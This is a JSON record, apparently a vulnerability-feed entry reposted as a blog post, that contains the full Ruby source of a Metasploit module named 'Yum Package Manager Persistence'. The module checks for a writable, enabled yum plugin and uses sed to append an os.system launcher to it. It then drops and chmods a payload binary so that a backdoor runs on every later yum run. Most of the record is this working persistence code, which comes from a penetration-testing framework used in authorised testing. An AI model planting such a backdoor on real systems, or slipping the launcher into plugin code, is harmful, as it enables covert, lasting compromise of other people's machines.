{“lastseen”:”2025-09-19T19:07:39″,”description”:”This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. …”,”published”:”2025-09-19T18:56:18″,”modified”:”2025-09-19T18:56:18″,”type”:”metasploit”,”title”:”Yum Package Manager Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-PERSISTENCE-YUM_PACKAGE_MANAGER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n include Msf::Post::File\\n include Msf::Post::Linux::System\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/linux\/local\/yum_package_manager_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Yum Package Manager Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will run a payload when the package manager is used.\\n This module modifies a yum plugin to launch a binary of choice.\\n grep -F ‘enabled=1’ \/etc\/yum\/pluginconf.d\/\\n will show what plugins are currently enabled on the system.\\n root persmissions are likely required.\\n Verified on Centos 7.1\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [‘Aaron Ringo’],\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e [\\n ARCH_CMD,\\n ARCH_X86,\\n ARCH_X64,\\n ARCH_ARMLE,\\n ARCH_AARCH64,\\n ARCH_PPC,\\n ARCH_MIPSLE,\\n ARCH_MIPSBE\\n ],\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘DisclosureDate’ =\\u003e ‘2003-12-17’, # Date published, Robert G. Browns documentation on Yum\\n ‘References’ =\\u003e [‘URL’, ‘https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux\/6\/html\/deployment_guide\/sec-yum_plugins’],\\n ‘Targets’ =\\u003e [[‘Automatic’, {}]],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Privileged’ =\\u003e true,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n # \/usr\/lib\/yum-plugins\/fastestmirror.py is a default enabled plugin in centos\\n OptString.new(‘PLUGIN’, [true, ‘Yum Plugin to target’, ‘fastestmirror.py’]),\\n OptString.new(‘PAYLOAD_NAME’, [false, ‘Name of binary to write’])\\n ]\\n )\\n\\n register_advanced_options(\\n [\\n OptString.new(‘WritableDir’, [true, ‘A directory where we can write files’, ‘\/usr\/local\/bin\/’]),\\n OptString.new(‘PluginPath’, [true, ‘Plugin Path to use’, ‘\/usr\/lib\/yum-plugins\/’])\\n ]\\n )\\n end\\n\\n def check\\n return CheckCode::Safe(\\”#{datastore[‘WritableDir’]} does not exist\\”) unless exists? datastore[‘WritableDir’]\\n return CheckCode::Safe(\\”#{datastore[‘WritableDir’]} not writable\\”) unless writable? datastore[‘WritableDir’]\\n\\n # checks \/usr\/lib\/yum-plugins\/PLUGIN.py exists and is writeable\\n plugin = datastore[‘PLUGIN’]\\n full_plugin_path = \\”#{datastore[‘PluginPath’]}#{plugin}\\”\\n return CheckCode::Safe(\\”#{full_plugin_path} does not exist\\”) unless exists? full_plugin_path\\n return CheckCode::Safe(\\”#{full_plugin_path} not writable\\”) unless writable? full_plugin_path\\n return CheckCode::Safe(‘yum not found on system’) unless command_exists? ‘yum’\\n return CheckCode::Safe(‘sed not found on system, required for exploitation’) unless command_exists? ‘sed’\\n\\n # \/etc\/yum.conf must contain plugins=1 for plugins to run at all\\n plugins_enabled = cmd_exec \\”grep -F ‘plugins=1’ \/etc\/yum.conf\\”\\n return CheckCode::Safe(‘Plugins are not set to be enabled in \/etc\/yum.conf’) unless plugins_enabled.include? ‘plugins=1’\\n\\n vprint_good(‘Plugins are enabled!’)\\n\\n # \/etc\/yum\/pluginconf.d\/PLUGIN.conf must contain enabled=1\\n plugin_conf = \\”\/etc\/yum\/pluginconf.d\/#{plugin.sub(‘.py’, ”)}.conf\\”\\n plugin_enabled = cmd_exec \\”grep -F ‘enabled=1’ #{plugin_conf}\\”\\n unless plugin_enabled.include? ‘enabled=1’\\n return CheckCode::Safe(\\”#{plugin_conf} plugin is not configured to run\\”)\\n end\\n\\n # check that the plugin contains an import os, to backdoor\\n import_os_check = cmd_exec \\”grep -F ‘import os’ #{full_plugin_path}\\”\\n unless import_os_check.include? ‘import os’\\n return CheckCode::Safe(\\”#{full_plugin_path} does not import os, which is odd\\”)\\n end\\n\\n CheckCode::Detected(‘yum installed and plugin found, enabled, and backdoorable’)\\n end\\n\\n def install_persistence\\n plugin = datastore[‘PLUGIN’]\\n full_plugin_path = \\”#{datastore[‘PluginPath’]}\/#{plugin}\\”\\n\\n # plugins are made in python and generate pycs on successful execution\\n print_warning(‘Either Yum has never been executed, or the selected plugin has not run’) unless exist? \\”#{full_plugin_path}c\\”\\n\\n # check for write in backdoor path and set\/generate backdoor name\\n payload_path = datastore[‘WritableDir’]\\n payload_path = payload_path.end_with?(‘\/’) ? payload_path : \\”#{payload_path}\/\\”\\n payload_name = datastore[‘PAYLOAD_NAME’] || rand_text_alphanumeric(5..10)\\n payload_path \\u003c\\u003c payload_name\\n\\n # check for sed binary and then append launcher to plugin underneath\\n print_status(‘Attempting to modify plugin’)\\n launcher = \\”os.system(‘setsid #{payload_path} 2\\u003e\/dev\/null \\\\\\\\\\u0026 ‘)\\”\\n sed_path = cmd_exec ‘command -v sed’\\n unless sed_path.include?(‘sed’)\\n fail_with Failure::NotVulnerable, ‘Module uses sed to modify plugin, sed was not found’\\n end\\n sed_line = \\”#{sed_path} -ie \\\\\\”\/import os\/ a #{launcher}\\\\\\” #{full_plugin_path}\\”\\n cmd_exec sed_line\\n\\n # actually write users payload to be executed then check for write\\n if payload.arch.first == ‘cmd’\\n write_file(payload_path, payload.encoded)\\n else\\n write_file(payload_path, generate_payload_exe)\\n end\\n @clean_up_rc \\u003c\\u003c \\”rm #{payload_path}\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”execute -f #{sed_path} -a \\\\\\”-i \/os\\\\.system.*#{payload_name}\/d #{full_plugin_path}\\\\\\”\\”\\n unless exist? payload_path\\n fail_with Failure::Unknown, \\”Failed to write #{payload_path}\\”\\n end\\n\\n # change perms to reflect bins in \/usr\/local\/bin\/, give good feels\\n chmod(payload_path, 0o755)\\n print_status(\\”Backdoor uploaded to #{payload_path}\\”)\\n print_good(‘Backdoor will run on next Yum update’)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/persistence\/yum_package_manager.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/persistence\/yum_package_manager\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-19T19:07:39″,”description”:”This module will run a payload when the package manager is used. This module modifies a yum plugin to launch a binary of choice. …”,”published”:”2025-09-19T18:56:18″,”modified”:”2025-09-19T18:56:18″,”type”:”metasploit”,”title”:”Yum…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-18149","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n